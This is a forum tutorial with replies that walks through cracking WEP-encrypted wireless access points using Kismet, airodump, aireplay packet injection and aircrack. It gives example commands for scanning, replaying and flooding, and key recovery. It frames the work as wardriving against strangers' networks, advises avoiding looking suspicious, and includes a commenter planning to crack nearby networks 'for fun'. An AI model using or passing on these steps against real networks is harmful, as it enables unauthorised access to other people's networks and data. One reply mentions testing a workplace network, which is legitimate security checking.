WEP cracking [In 10mins]

More Cracking WEP GUIDES and Information From GovernmentSecurity.org
Intro:

Ok, this is a tutorial explaining how to crack most WEP encrypted Access Points out there. The tools used will be as follows:

Kismet (any working version)
>= Aireplay 2.2 beta
>= Aircrack 2.1

As for wireless cards, i recommend any Prism , Orinoco , or Atheros based cards (i used the D-Link 650 Rev.1a).


Getting Started:

Let's see, First thing you are going to want to do is charge your lappy to the top (aireplay and aircrack drain the battery quite a bit) Next you are going to want to load up your favourite live CD (i used Whoppix 2.7 final) or Linux OS, then stumble across a encrypted WLAN, use Kismet to do so. Make sure you have configured your kismet .conf file correctly to be able to use your card (locate your kismet.conf file and open with your favourite text editor, i used pico);

^^ that is an example of part of my kismet.conf, initially that was wrong for me, i had to comment out the first line and uncomment the second (my wireless device name was wlan0, you can find this out by typing 'iwconfig' in a terminal).
Note: To find your cards chipset have a good google on the model number of your card or try checking here http://www.linux-wlan.org/docs/wlan_adapters.html.gz . A full list of supported chipsets can
be found on the Kismet website under Documentation.

Changed kismet.conf:



Save the changes you make and go back to a terminal and run 'kismet', it should load up if you configd it properly. Once you have got kismet going, have a good stumble around your area, to see if a WLAN has WEP enabled, kismet should have a column near the ESSID titled with 'W' if it has WEP enabled it will have a Y, if not it will be a N.


Going in for the kill:

So now you got a target you are going to make sure you dont look suspicious and you got at least 15mins worth of battery life left Razz. Making sure you know the channel the Access Point is on (under the CH cloumn in kismet) and also the mac address of the Access Point by hiting 's' (to sort) then scrolling to the desired Access Point and then typing 'i' which gives you detailed info on the Access Point selected.

First off you are going to want to set your wireless card to the right mode, depending on what chipset depends on what commands you have got to use:



Read the AirePlay2.2 readme for more info.
Start by opening up another terminal window and cd into your aircrack directory and launch airodump:
Code:
#./airodump
[version crap]
usage: ./airodump <wifi interface> <output filename> [mac filter]

e.g
./airodump wlan0 linksys

The mac filter is used when you have more than one Access point on the same channel at once, so say you have 'jim_home' and 'linksys' both essid's of access points both on channel 11 you would grab the mac address of of the Access Point in kismet, by hiting 's' (to sort) then scrolling to the desired Access Point and then typing 'i' which gives you detailed info on the Access Point selected. Ok so now you have got a stream of packets from your target, you see the IV column, those are whats known as 'weak key' packets, we want as many of them as we can get (400k+ is a nice number Razz). Now we are going to capture a 'weak key' packet from on the network we are targeting and going to flood the Access Point with it in hope that we get lots of 'weak key' replies sent out so we can eventually crack the password. So now in your other terminal window 'cd' into your aireplay directory and execute aireplay ('./aireplay'[return]):




e.g
./aireplay -b 00:FF:00:FF:00:FF -x 512 wlan0

Here we are going to grab a few packets from the Access Point with the MAC address 00:FF:00:FF:00:FF until we catch a 'weak key' packet which then aireplay will ask you if you want to use to then flood the Access Point with that packet. when it asks you if it can use one of the packets hit 'y' then return. If you flick back to your terminal with airodump running you should see the packets being captured will increase by a huge amount and with that the IV packets should also be increasing pretty damn fast aswell, if all went well in about 10mins you should have enough packets to then dump into aircrack. Ok so you want at least 400k+ IV packets (the more the better), once you got a decent amount hit 'control+c' in both terminal windows to terminate both aireplay and airodump, now 'cd' into your aircrack directory and run aircrack ('./aircrack'[return]):




e.g
./aircrack -n 128 linksys.cap

what i did there was set aircrack to read my packet file called linksys.cap (what airodump creates) and telling aircrack it was a 128 bit encryption. If all goes well you will get the key in nice red text.

KEY FOUND: [ Pwn3d ]

Happy WarDriving.

(Please reply with any errors in my tutorial)

good job man, this is a great tutorial. most of the tutorials i have seen on the top are ehh very prism based card biased. just my 2c. thanks for this great tut ;]




Aicd

thx 4 tutorial it´s very nice i will test it now

That's nothing new. Look at here:

http://www.governmentsecurity.org/forum/in...topic=14890&hl=

yes thats the whoppix tutorial, i based this one from that (if you read it, it says in the first 5 lines) i am not trying to steal thunder from whoppix. This tutorial expandes and adds detail to it.

nice one UmI. Like the fact Its explained in text too. Flash tuts sometimes arn't very protable and can miss out more technical detais.

/me adds tut to his achieve

belgther: you should read the tutorial before you comment on it

these guys are trying to get in as full fledged members. there's no need to always hit the search button and shoot them down. personally, i think it's explained pretty well.

I have a laptop loaded with fedora, Kismet and airsnort on, I can find loads of encrypted networks where I live but im thinking is it too late in the day for me to try and have some fun.

i.e. have all the manufacturers fixed the issue with wep. I don't want to be sat outside a building or house trying to crack a wep enabled AP when there is no point.

I have heard that you cannot crack Cisco becuase you can not get more than 96 packets or 'interesting packets'

anyway if anyone can let me know, I would appreciate it.

we got some wifi network @ work ... thanx sharing that tuto, it's gonna be usefull to check it they are secure